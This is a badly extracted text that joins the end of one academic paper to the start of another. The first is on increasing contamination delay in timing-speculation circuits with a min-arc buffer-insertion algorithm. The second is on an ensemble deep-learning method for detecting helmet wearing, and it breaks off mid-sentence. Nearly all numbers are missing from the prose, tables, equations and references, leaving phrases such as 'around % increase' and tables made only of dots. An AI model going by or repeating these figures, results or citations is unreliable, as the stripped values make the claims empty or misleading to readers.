. . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . (continued on next page) avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . we notice from the table that increase in power consumption is also dependent on the circuit topology rather than the size of the circuit. without any leeway (corresponding to l ), with every % increase in t there is only around % increase in power. this holds for most circuits, except for smaller circuit c . we also notice that for a given t , increasing l has very minimal effect ( %– %) on the power increase. therefore, while applying our algorithm, an optimal value of t can be chosen as any value of l can be chosen without altering the power budget. when timing speculation is used for overclocking, voltage is kept constant. therefore, increase in power is independent of voltage and is dependent only on frequency change and the additional power overhead caused by the buffers. in this paper, as we primarily analyze our algorithm at circuit-level, we only present power results at circuit-level. changes in system-level power estimates can be easily derived with the power analysis present in this section. when compared to area overheads of our algorithm, power results presented in table are quite interesting. for example, for circuit c where we have seen % area increase, power increase is only about %. the power increase is relatively small when compared to the area increase. it is due to the fact the delay buffers draw much less current than the other standard cells. even though we are limited with the type of delay buffer configurations available in our cell library, much more complex buffers can be constructed at gate-level which can consume less power without degrading delay characteristics. related literature early works on timing verification involved identification and categorization of long paths as either false paths or sensitizing paths (du, yen & ghanta, ). long paths that are false paths (paths with no activity) unnecessarily increase the circuit critical delay. therefore, detecting false paths and mitigating them is a critical issue in digital circuits even to this day (cheng et al., ; tsai & huang, ; coudert, ). as already mentioned in ‘introduction,’ not many works are done keeping short paths in mind. sylon-dream accomplishes faster multi-level networks by its level reduction technique (sdlr) (chen & muroga, ). the non-critical paths are processed by an area reduction procedure to reduce network area without increasing the maximum depth. sdlr uses the concept of permissible functions in both level and area reduction procedures. gate resizing and buffer insertion are two major techniques for critical path optimization. critical path selection instead of sensitization is suggested for performance optimization (chen, du & liu, ). here the objective is to select a small set of paths to ease the optimization process by guaranteeing the delay of the circuit to be no longer than a given threshold. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table percentage power increase after addition of buffers relative to base configuration t l . ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . (continued on next page) avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . several optimization techniques, involving clustering, logic analysis and gate resizing are proposed in touati, savoj & brayton ( ), rohfleisch, wurth & antreich ( ), entrena et al. ( ), fang & jone ( ) and lu et al. ( ). a statistical timing analysis approach is investigated in jyu & malik ( ). a re-timing and re-synthesis approach is presented in pan ( ). this work suggests re-synthesizing the circuit to expose signal dependencies. the optimization scheme tightly constrains logic re-synthesis, so that the re-synthesized circuit is guaranteed to meet the performance target. recent work in kim, joo & kim ( ) focus on buffer insertion to solve variation in clock skew. the authors in lin, lin & ho ( ) explore adjustable delay buffer insertion for minimizing clock skew in multi voltage designs. buffer insertion in the presence of process variation is explored in xiong & he ( ) with the focus on improving yield. the authors in dynatune propose an algorithm based on min-cut approach to shorten the long path delay (wan & chen, ). it is based on simulation profiling and uses multiple threshold voltage cells to reduce the delay of long paths. even though our min-cut algorithm is similar to the dynatune algorithm, it is applied to a drastically different aspect of timing speculation framework i.e., increasing contamination delay. unlike dynatune, our approach doesn’t use simulation profiling to drive the circuit optimization as hold time delay should be satisfied all the time. therefore, our algorithm considers more tighter constraints than the dynatune algorithm. although there are several delay optimization approaches proposed in literature, all of them try to hold the critical path delay within a threshold. it is fundamental that all the timing optimization algorithms must consider short path timing constraints. data latches in a pipelined architecture inherently possess set up and hold time constraints. it is necessary to make sure that the resulting circuit has no set-up or hold time violations, to guarantee correct data transfers. there are algorithms to make sure the circuit is free of any such violations considering both long and short paths (fung, betz & chow, ). however, there is no consideration for short path constraints from the perspective of aggressive clocking we are dealing with. the authors in ye et al. ( ) propose a steepest descent method (sdm) to determine the potential benefits of timing speculation. from the experiments conducted, it is found that circuit topology plays a big role in realizing the benefits of timing speculation. our algorithm can be used for circuits that shows promising results using sdm approach analyzed with design parameters like process technology, desired frequency and voltage corners, error penalty of the implementation etc. in this paper, we try to alleviate the contamination delay limitation imposed on aggressive timing speculation architectures. due to this, we fundamentally differ from all of the existing works. this is the first work avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aimed at increasing the contamination delay of digital circuits up to a given threshold. it is also important to point out that our algorithm works complementary to existing synthesis schemes and can also be integrated with physically aware timing optimizations that are used for achieving timing closure. conclusions contamination delay is one of the major bottlenecks for achieving higher performance in timing speculation architectures. in this paper, we investigated the theoretical margins for improving performance for the dual latch framework. we brought forward the limits to performance enhancements in timing speculation. using our analysis, we demonstrated how much performance improvement is achievable by increasing the contamination delay of the circuit without affecting the critical path delays. performance gains were attained even for the cases affecting propagation delay by up to %. we studied further how these gains vary with target timing error rate. the main goal of this paper is to increase the short path delays to a specified threshold, without (or minimally) affecting the critical path delays. we proposed the min-arc algorithm to achieve this goal. we studied iscas- circuits, where we have shown that the min-arc is able to increase the contamination delay of all the circuits without affecting propagation delay. we analyzed further as to how much these short paths increase while allowing a small leeway to critical path delay. we observed moderate area and power increase in the circuits implementing the min-arc algorithm. finally, we discuss how the algorithm preserves the path delay distributions of the circuits and therefore, closely maintaining the rate of timing error occurrences from the original circuit. as a future improvement, gate/cell sizing approach can be used instead of adding delay buffers for improved area, power results. to conclude, min-arc algorithm successfully increases the contamination delay of logic circuits with moderate area and power overheads. the results we have obtained are very promising, opening up different directions for the near future. additional information and declarations funding the research reported in this paper is funded in part by the information infrastructure institute and the jerry r. junkins endowment at iowa state university. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: information infrastructure institute. jerry r. junkins endowment. competing interests arun k. somani is an academic editor for peerj computer science. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • naga durga prasad avirneni, prem kumar ramesh and arun k. somani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data was supplied as a supplemental dataset. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references austin tm. . diva: a reliable substrate for deep submicron microarchitecture de- sign. in: microarchitecture, . micro- . proceedings. nd annual international symposium on. piscataway: ieee, – . avirneni n, ramesh p, somani a. . utilization aware power management in reliable and aggressive chip multi processors. ieee transactions on computers ( ): – . avirneni ndp, somani ak. . low overhead soft error mitigation techniques for high-performance and aggressive designs. ieee transactions on computers ( ): – doi . /tc. . . avirneni ndp, somani ak. . countering power analysis attacks using reliable and aggressive designs. ieee transactions on computers ( ): – . bezdek m. . utilizing timing error detection and recovery to dynamically improve superscalar processor performance. master’s thesis, iowa state university. burger d, austin tm. . the simplescalar tool set, version . . acm sigarch computer architecture news ( ): – . chen h-c, du dh-c, liu l-r. . critical path selection for performance optimiza- tion. ieee transactions on computer-aided design of integrated circuits and systems ( ): – doi . / . . chen k-c, muroga s. . timing optimization for multi-level combinational networks. in: proceedings of the th acm/ieee design automation conference. new york: acm, – . cheng l, chen d, wong mdf, hutton m, govig j. . timing constraint-driven technology mapping for fpgas considering false paths and multi-clock domains. in: proceedings of the ieee/acm international conference on computer-aided design. piscataway: ieee press, – . coudert o. . an efficient algorithm to verify generalized false paths. in: design automation conference (dac), th acm/ieee. piscataway: ieee, – . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. das s, roberts d, lee s, pant s, blaauw d, austin t, flautner k, mudge t. . a self- tuning dvs processor using delay-error detection and correction. ieee journal of solid-state circuits ( ): – doi . /jssc. . . du dh, yen sh, ghanta s. . on the general false path problem in timing analysis. in: proceedings of the th acm/ieee design automation conference. new york: acm, – . edmonds j, karp rm. . theoretical improvements in algorithmic efficiency for network flow problems. journal of the acm ( ): – doi . / . . entrena l, olías e, uceda j, espejo j. . timing optimization by an improved redundancy addition and removal technique. in: proceedings of the conference on european design automation. piscataway: ieee computer society press, – . ernst d, kim ns, das s, pant s, rao r, pham t, ziesler c, blaauw d, austin t, flautner k, mudge t. . razor: a low-power pipeline based on circuit-level timing speculation. in: micro- , th annual ieee/acm international symposium on microarchitecture, piscataway: ieee, – . fang c-l, jone w-b. . timing optimization by gate resizing and critical path identification. ieee transactions on computer-aided design of integrated circuits and systems ( ): – doi . / . . fung r, betz v, chow w. . simultaneous short-path and long-path timing opti- mization for fpgas. in: proceedings of the ieee/acm international conference on computer-aided design. piscataway: ieee computer society, – . greskamp b, torrellas j. . paceline: improving single-thread performance in nanoscale cmps through core overclocking. in: pact’ proceedings of the th in- ternational conference on parallel architecture and compilation techniques. piscataway: ieee, – . greskamp b, wan l, karpuzcu ur, cook jj, torrellas j, chen d, zilles c. . blueshift: designing processors for timing speculation from the ground up. in: ieee th international symposium on high performance computer architecture, . hpca . piscataway: ieee, – . gupta ms, rivers ja, bose p, wei g-y, brooks d. . tribeca: design for pvt variations with local recovery and fine-grained adaptation. in: proceedings of the nd annual ieee/acm international symposium on microarchitecture. new york: acm, – . hansen mc, yalcin h, hayes jp. . unveiling the iscas- benchmarks: a case study in reverse engineering. ieee design & test of computers ( ): – doi . / . . jyu h-f, malik s. . statistical timing optimization of combinational logic circuits. in: computer design: vlsi in computers and processors, . iccd’ . proceedings., ieee international conference on. piscataway: ieee, – . kim j, joo d, kim t. . an optimal algorithm of adjustable delay buffer insertion for solving clock skew variation problem. in: proceedings of the th annual design automation conference. new york: acm, . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jssc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. lin k-y, lin h-t, ho t-y. . an efficient algorithm of adjustable delay buffer insertion for clock skew minimization in multiple dynamic supply voltage designs. in: proceedings of the th asia and south pacific design automation conference. piscataway: ieee press, – . lu a, eisenmann h, stenz g, johannes fm. . combining technology mapping with post-placement resynthesis for performance optimization. in: computer design: vlsi in computers and processors, . iccd’ . proceedings. international conference on. piscataway: ieee, – . pan p. . performance-driven integration of retiming and resynthesis. in: proceedings of the th annual acm/ieee design automation conference. new york: acm, – . ramesh pk, subramanian v, somani ak. . system level analysis for achieving thermal balance and lifetime reliability in reliably overclocked systems. international journal on advances in systems and measurements ( ): – . rohfleisch b, wurth b, antreich k. . logic clause analysis for delay optimization. in: design automation, . dac’ . nd conference on. piscataway: ieee, – . shenoy nv, brayton rk, sangiovanni-vincentelli al. . minimum padding to satisfy short path constraints. in: computer-aided design, . iccad- . digest of technical papers., ieee/acm international conference on. piscataway: ieee, – . stine je, castellanos i, wood m, henson j, love f, davis wr, franzon pd, bucher m, basavarajaiah s, oh j, jenkal r. . freepdk: an open-source variation-aware design kit. in: proceedings of the ieee international conference on microelectronic systems education. piscataway: ieee computer society, – . subramanian v, bezdek m, avirneni nd, somani a. . superscalar processor performance enhancement through reliable dynamic clock frequency tuning. in: dependable systems and networks, . dsn’ . th annual ieee/ifip international conference on. piscataway: ieee, – . touati hj, savoj h, brayton rk. . delay optimization of combinational logic cir- cuits by clustering and partial collapsing. in: computer-aided design, . iccad- . digest of technical papers., ieee international conference on. piscataway: ieee, – . tsai s, huang c-y. . a false-path aware formal static timing analyzer considering simultaneous input transitions. in: design automation conference, . dac’ . th acm/ieee. piscataway: ieee, – . wan l, chen d. . dynatune: circuit-level optimization for timing speculation considering dynamic path behavior. piscataway: ieee, – . xiong j, he l. . fast buffer insertion considering process variations. in: proceedings of the international symposium on physical design. new york: acm, – . ye r, yuan f, zhang j, xu q. . on the premises and prospects of timing speculation. in: proceedings of the design, automation & test in europe conference & exhibition. san jose: eda consortium, – . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. submitted august accepted october published december corresponding author chengbin peng, pengcheng- bin@nbu.edu.cn academic editor faizal khan additional information and declarations can be found on page doi . /peerj-cs. copyright fan et al. distributed under creative commons cc-by . open access a deep learning-based ensemble method for helmet-wearing detection zheming fan , chengbin peng , , licun dai , feng cao , jianyu qi and wenyi hua college of information science and engineering, ningbo university, ningbo, china ningbo institute of industrial technology, chinese academy of sciences, ningbo, china abstract recently, object detection methods have developed rapidly and have been widely used in many areas. in many scenarios, helmet wearing detection is very useful, because people are required to wear helmets to protect their safety when they work in construction sites or cycle in the streets. however, for the problem of helmet wearing detection in complex scenes such as construction sites and workshops, the detection accuracy of current approaches still needs to be improved. in this work, we analyze the mechanism and performance of several detection algorithms and identify two feasible base algorithms that have complementary advantages. we use one base algorithm to detect relatively large heads and helmets. also, we use the other base algorithm to detect relatively small heads, and we add another convolutional neural network to detect whether there is a helmet above each head. then, we integrate these two base algorithms with an ensemble method. in this method, we first propose an approach to merge information of heads and helmets from the base algorithms, and then propose a linear function to estimate the confidence score of the identified heads and helmets. experiments on a benchmark data set show that, our approach increases the precision and recall for base algorithms, and the mean average precision of our approach is . , which is better than many other approaches. with gpu acceleration, our approach can achieve real-time processing on contemporary computers, which is useful in practice. subjects computer vision, data mining and machine learning, social computing keywords ensemble method, deep learning, helmet-wearing detection, face detection introduction helmets can play a vital role in protecting people. for example, many severe accidents in production and work sites and roads have been related to violations of wearing helmets. some personnel may lack safety awareness in a working site and often do not or forget to wear helmets. on the road, craniocerebral injury is the leading cause of serious injury to cyclists in road traffic (world health organization, ). however, wearing a helmet reduces the risk of head injury of motorcycle riders by % (liu et al., ), and wearing a helmet reduces the risk of head injury for cyclists by %– % (thompson, rivara & thompson, ). monitoring helmet-wearing manually can have many limitations, as people can be fatigue and costly. reducing manual monitoring while ensuring that relevant personnel wearing helmets all the time in the working area has become an urgent problem. how to cite this article fan z, peng c, dai l, cao f, qi j, hua w. . a deep learning-based ensemble method for helmet-wearing de- tection. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:pengchengbin@nbu.edu.cn mailto:pengchengbin@nbu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. image recognition technology can reduce the workforce and material expenditures, and can significantly protect workers in many areas. developments of computer vision algorithms and hardware (feng et al., ) have paved the road for the application in helmet detection. deep neural networks have gained much attention in image classification (krizhevsky, sutskever & hinton, ), object recognition (donahue et al., ), and image segmentation (garcia-garcia et al., ). previous computer vision algorithms for helmet detection are usually used in relatively simple scenes. for helmet detection, rubaiyat et al, ( ) used a histogram of oriented gradient and a support vector machine to locate persons, then used a hough transform to detect helmet for the construction worker. li et al. ( b) identified helmets by background subtraction. li et al. ( a) used vibe background modeling algorithm and human body classification framework c to select people and heads, and then identified whether people wore helmets through color space transformation and color feature recognition. however, such approaches are typically not suitable for complex scenes and dynamic backgrounds, such as construction sites, workshops, and streets. choudhury, aggarwal & tomar ( ) and long, cui & zheng ( ) use single shot object detector algorithm to detect helmets. siebert & lin ( ) used retinanet which uses a multi-scale feature pyramid and focal loss to address the general limitation of one-stage detectors in accuracy, it works well in certain situations but its performance is highly scene dependent and influenced by light. bo et al. ( ) use the you only look once (yolo) algorithm to accurately detect helmet wear in images with an average of four targets. however, most of these approaches are not suitable for both small and large helmets at the same time. in this work, we propose a framework to integrate two complementary deep learning algorithms to improve the ability of helmet-wearing detection in complex scenes. our approach is able to identify regular-size and tiny-size objects at the same time for helmet- wearing detection, and can be used for detection in complex scenes. this framework can outperform traditional approaches on benchmark data. related work the starting point of cnn is the neurocognitive machine model (fukushima & miyake, ). at this time, the convolution structure has appeared. the classic lenet (lecun et al., ) was proposed in . however, cnn’s edge began to be overshadowed by models such as svm (support vector machine) later. with the introduction of relu (rectified linear units), dropout, and historic opportunities brought by gpu and big data, cnn ushered in a breakthrough in : alexnet (krizhevsky, sutskever & hinton, ). in the following years, cnn showed explosive development, and various cnn models emerged. cnn has gradually gained the favor of scholars due to its advantages of not having to manually design features when extracting image features (shi, chen & yang, ). fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. many recent object detection approaches are based on rcnn (region-based convolutional neural networks) algorithms and yolo algorithms (redmon et al., ). rcnn is an improved algorithm based on cnn. girshick et al. propose an epoch-making rcnn algorithm (girshick et al., ) in the field of object detection. the central idea is to use a search selective method to extract some borders from the image. then the size of the area divided by the border is normalized to the convolutional neural network input size, and then the svm is used to identify the target. the bounding box of the target is obtained through a linear regression model. it brought deep learning and cnn to people’s sight. however, there are disadvantages such as cumbersome training steps, slow test training speed, and large space occupation. in order to improve the training and testing speed of rcnn, fast rcnn algorithm (girshick, ) was developed. it uses fewer layers while adding an roi pooling layer to adjust the convolution area, and using softmax instead of the original svm for classification. compared with rcnn, fast rcnn has improved training and testing speed. however, because the selective search method is also used to extract the borders of the region of interest, the speed of this algorithm is still not ideal for working with large data sets. later, faster rcnn (ren et al., ) integrates feature extraction, proposal extraction, bounding box regression, classification, etc. into a network. the overall performance is far superior to cnn, and at the same time, it runs nearly much faster than cnn. thus, faster rcnn is commonly used in many applications. the faster rcnn performs well for relatively large objects, but when detecting small faces or helmets, there will be a large false negative rate. tiny face has made certain optimizations for small face detection. it mainly optimizes face detection from three aspects: the role of scale invariance, image resolution, and contextual reasoning. scale invariance is a fundamental property of almost all current recognition and object detection systems, but from a practical point of view, the same scale is not applicable to a sensor with a limited resolution: the difference in incentives between a px face and a px face is undeniable (hu & ramanan, ). ramanan et al. conducted an in-depth analysis of the role of scale invariance, image resolution, and contextual reasoning. compared with mainstream technology at the time, the error rate can be significantly reduced (hu & ramanan, ). boosting algorithm was initially proposed as a polynomial-time algorithm, and the effectiveness has been experimentally and theoretically proved (schapire, ). afterward, freund et al. improved the boosting algorithm to obtain the adaboost algorithm (freund & schapire, ). the principle of the algorithm is to filter out the weights from the trained weak classifiers by adjusting the sample weights and weak classifier weights. the weak classifiers with the smallest coefficients are combined into a final robust classifier. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in this work, in order to identify a variety of heads and helmets in complex scenes, we propose a framework to use incorporate multiple complementary deep learning algorithms to improve the joint performance. materials & methods method to address the helmet-wearing detection problem, we compare several object detection methods, such as the naive bayes classifier, svm, and artificial neural networks classifier. naive bayes usually needs independent distributive premises. svm is difficult to training for various scenes. in the case of a complex scene and huge training data, artificial neural networks are expected to have better accuracy and reliability, so we propose to use artificial neural networks, especially, convolutional neural networks, to solve this issue. to address the disadvantages raised by long-range cameras, we further improve the performance by integrating multiple complementary deep neural network models. base algorithms faster rcnn for detecting faces and helmet-wearing. after images are fed, faster rcnn firstly extracts image feature maps through a group of basic conv+relu+pooling layer. next, rpn (region proposal networks) will set a large number of anchors on the scale of the original image, and randomly select positive anchors and negative anchors from all anchors for binary training, and use these anchors and a softmax function to initially extract positive anchors as the candidate area. at this time, the candidate regions are not accurate and require bounding boxes. for a given image i, we use a to represent the ground-truth anchors. we use af and cf to represent the identified bounding boxes and helmet-wearing confidence scores, respectively, computed by the faster-rcnn algorithm. if we use f to represent the algorithm, wf to represent the weight of the network, this approach can be written as follows. af,cf =f(i,wf) ( ) if we consider af =f(i,wf)[ ] and cf =f(i,wf)[ ], we can use loss(f(i,wf)[ ],f(i,wf)[ ],a) ( ) to represent the loss function (fukushima & miyake, ) when to minimize differences between the detected anchors and the ground-truth. thus, when we train this model, the optimization is as follows. w∗f =argminwfloss(f(i,wf)[ ],f(i,wf)[ ],a) ( ) tiny face for detecting faces. the overall idea of tiny face is similar to rpn in faster rcnn, which is a one-stage detection method. the difference is that some scale specific design and multi-scale feature fusion are added, supplemented by image pyramid so that fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the final detection effect for small faces is better. the training data were changed by three scales, with one-third of the probability respectively and sent to the network for training. multiple scales could be selected to improve the accuracy rate in the prediction. for a given image i, we can also use at and ct to represent the identified bounding boxes and confidence scores computed by the tiny face algorithm, so if we use t to represent the tiny face algorithm and wt to represent the corresponding weight, we can have at,ct =t(i,wt ) ( ) however, tiny face can only be used to determine whether the detection target contains a human face and cannot directly distinguish whether the target is wearing a helmet. thus, we propose to use cnn to overcome this disadvantage. cnn for detecting helmet-wearing. for anchors determined by tiny face, we can use a cnn to detect helmets above the face. we enlarge the face area detected by the tiny face and feed it into the cnn model for prediction. the confidence scores indicating whether there is a helmet above the face can be computed by the cnn algorithm cc =c(at,i,wc), ( ) where c is a function representing the forward propagation of cnn. here, c is a composition of two convolution layers and one fully connected layer. the loss function is again to minimize the difference between detected helmets and the ground-truth loss(at,c(at,i,wc),a). ( ) ensemble model detecting high and low resolution helmets for the two lists of face anchors af and at detected by the base algorithms above, we merge them with the following strategy. we first initialize an empty anchor list as and two score vector csf and csc. for the ith anchor in af and the corresponding score in cf, namely, af[i] and cf[i], we first insert them into as and csf respectively. then af[i] is compared with all the anchors in at . if some anchors in at have more than % overlapping area with af[i], we remove these anchors in at and remove the corresponding entries in cc. we also take the mean value of the removed entries in cc and insert it into csc. if no overlapped anchors in at is found, we insert zero into csc. after all the anchors in af in processed, the remaining anchors in at , the remaining confidence values in cc, and a zero vector of the same length is inserted into as, csc, and csf, respectively. at last, we compute the covering area of each anchor in as and store them in δ. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the pseudocode of the merge process can be described as follows. after the data preparation, many ensemble learning methods can be used for model integration. in this work, we consider a basic ensemble model defined as follows s(csf,csc,δ,α)= ∑ i αihi(csf,csc,δ) ( ) where α is the model parameter, δ is a vector containing the area of corresponding anchors, and hi() is a classifier. we choose decision trees with maximum depth of two in the experiment, and i is ranged from to . the variable δ is used here because the two base algorithms are good at identifying relatively large and small objects respectively, and adding covering areas of anchors can help improve the accuracy. thus, in the ensemble method, as is the anchor lists, and cs=s(csf,csc,δ,α) contains the corresponding confidence values about helmet-wearing. to train this model, we merge the anchor set as and the ground-truth set a in a similar manner as merging af and at , and we use ĉsf, ĉsc and ĉ to represent the corresponding variables after merging. zeros are filled if the corresponding anchor does not exist before merging. then, the loss between the identified anchors in as and the ground-truth anchors a is e(δ,α,ĉsf,ĉsc,ĉ)= n∑ i= (s(ĉsf[i],ĉsc[i],δ,α)− ĉ[i]) ( ) where n is the total anchors after merging. the optimal value of α can be computed by minimizing the error α ∗ =argminαe(α,ĉsf,ĉsc,ĉ) ( ) fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the whole process can be described by the pseudocode below. experiments in order to evaluate the performance of our framework, we use five criteria: tpr=m/n ( ) fpr= l/k ( ) re =m/n ( ) fnr= −re ( ) pre =m/(m+l) ( ) where tpr is the true positive rate, fpr is the false positive rate, fnr is the false negative rate, re is the recall rate, pre is the precision rate, m is the correct prediction by models under the current threshold, n is the number of parts of the model detection result that are identical to the truth ground, l is the false prediction by models under the current threshold, k is the number of parts of the model detection result that are different from the truth ground, and n is the number of targets that actually exist. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure faster rcnn detecting big faces. full-size doi: . /peerjcs. /fig- to evaluate our approach, we take the publicly available benchmark data set (safety helmet wearing-dataset, ), containing images from construction sites, roads, workshops, and classrooms. the data set consists of a total of , images. we use five-fold cross validations for experiments. we randomly divide all the images into five parts. training set, validation set, and testing set contains / , / , and / of the total images respectively. preliminary analysis the detection results of faster rcnn for faces are shown in figs. and . from these two figures, we can see that faster-rcnn is suitable for detecting large objects, but not finding small ones. the detection results of tiny face are shown in fig. . from this result, we can see that tiny face is good at finding small faces. to compare the differences between the two models, we used faster rcnn and tiny face to test the images from the data set, and count the number of faces of different sizes detected by the two models. figure is the histogram of real data, and fig. is the histogram of face sizes detected by faster rcnn. taking the number of pixels (px ) as the area measurement, a face with an area smaller than px is defined as a small face, and a face larger than px is defined as a large face. because of the large area span, the smallest face is only px , while the largest face can reach px . in order to prevent the histograms from crowding together, only faces with an area less than px are shown in the figure. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure faster rcnn detecting small faces. full-size doi: . /peerjcs. /fig- figure tiny face detecting small faces. full-size doi: . /peerjcs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure histogram of real data. full-size doi: . /peerjcs. /fig- figure histogram of face sizes detected by faster rcnn. full-size doi: . /peerjcs. /fig- according to statistics, there are actually , big faces and small faces. the initial model of faster rcnn can detect , big faces and small faces. under the assumption that the labels are correct, the false negative rate of big faces is . %, and that of small faces is . %. obviously, the faster rcnn model has lower accuracy for small faces. then we performed statistics on tiny face and got the histogram of tiny face detection results in fig. . tiny face can detect large faces and small faces. the false negative rate for large faces is . %, which is . % higher than faster rcnn, and the false negative rate for small faces is . %, which is . % lower than faster rcnn. although it is only a preliminary model, the model has not been adjusted and the amount of training has been fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure histogram of face sizes detected by tiny face. full-size doi: . /peerjcs. /fig- adjusted to improve the accuracy of the model, but it is not difficult to see from the current data that the detection capabilities of the faster rcnn and tiny face models have their own focus. when faster rcnn detects large faces, it has a great advantage, and tiny face’s ability to detect small faces is better than faster rcnn. we can find that faster rcnn has a higher true positive rate for detecting large faces and tiny face has a higher true positive rate for detecting small faces. the overall effect can be better if we can combine the two methods. accuracy of base algorithms for helmet detection accuracy of f(i,w∗f ). in this part, we evaluate the accuracy of t(i,w ∗ t ) alone in algo. . theoretically, the more training steps the model has, the better, but in order to prevent overfitting, we still need to observe the accuracy of the model under different training steps. in the beginning, we select some images from training dataset to evaluate the model. we trained , steps and used the model to test the images of the training set, but it was obvious that the effect was not very satisfactory. because t(i,w∗t ) is based on faster rcnn, which has high accuracy, it is easy to miss the mark of small faces. therefore, the quality of the model can be preliminarily judged by the number of detected targets, and then we gradually increased the number of training steps. when the number of training steps reaches , steps, the number of detected targets in the detection results of , test set images is basically maintained at about , . as the number of training steps increases, the number of detected targets increases slightly. when the number reaches , steps, the number of detected targets is , . at this time, precision rate of the model is . %,and the recall rate is . %. when the number of training steps reaches , steps, the number of detected targets is close to , . at this time, the precision rate of the model is . %, and the recall rate is . %. we find that fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table relationship between training steps and accuracy. steps precision rate recall rate , . % . % , . % . % , . % . % , . % . % , . % . % figure roc with respect to a full-size doi: . /peerjcs. /fig- although the recall rate has a slight increase, but the precision rate is much lower, so we chose the model with , training steps as the final model. see table for the accuracy of f(i,w∗f ) under different training steps. regarding to the scoring threshold, it is . by default, which means that when the score is lower than . , the result will be discarded. we successively set the threshold to . , . , . , . , . , and tested the validation data to choose the one that works best. finally, we found that when the threshold is . , the precision rate of the test result is . %, and the recall rate is . %, which is better than other thresholds. after comprehensive consideration, we finally keep . as the threshold for the ensemble. the roc curve on the training set is shown in fig. . when training this model, in order to distinguish whether an individual wearing a helmet, we use two labels: people wearing and without wearing a helmet. it makes the final trained model more accurately distinguish whether the target wears a helmet. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure roc with respect to a_t and c_c. full-size doi: . /peerjcs. /fig- accuracy of t(i,w∗t ). in this part, we consider the accuracy of t(i,w ∗ t ) alone in algo. . it is basically a trained tiny face model. we lowered the scoring threshold of tiny face to . , requiring the tiny face model to be able to determine the location of the small face, and it does not need it to accurately return the scoring value. the precision rate of face detection was . %, and the recall rate was . %. accuracy of c(at,i,w∗c). in this part, we consider the accuracy of c(at,i,w 